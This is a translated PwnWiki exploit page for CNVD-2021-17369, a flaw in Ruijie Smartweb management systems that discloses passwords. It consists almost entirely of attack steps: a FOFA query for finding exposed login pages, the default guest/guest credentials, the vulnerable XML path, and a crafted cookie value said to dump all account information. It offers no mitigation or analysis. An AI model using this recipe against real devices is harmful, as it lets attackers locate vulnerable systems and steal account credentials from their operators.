CNVD-2021-17369 Ruijie Smartweb Management System Password Information Disclosure Vulnerability

From PwnWiki

This page is a translated version of the page CNVD-2021-17369 銳捷Smartweb管理系統密碼信息洩露漏洞 and the translation is 86% complete.

Outdated translations are marked like this.

Other languages:

Chinese • ‎English • ‎中文（中国大陆）‎ • ‎中文（台灣）‎

FOFA

title="无线smartWeb--登录页面"

Default guest password

guest/guest

Vulnerability location

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml

Exploit

Cookie add the following

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

Can get all account information

Reference

https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ

Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-17369_銳捷Smartweb管理系統_密碼信息洩露漏洞/en&oldid=7102"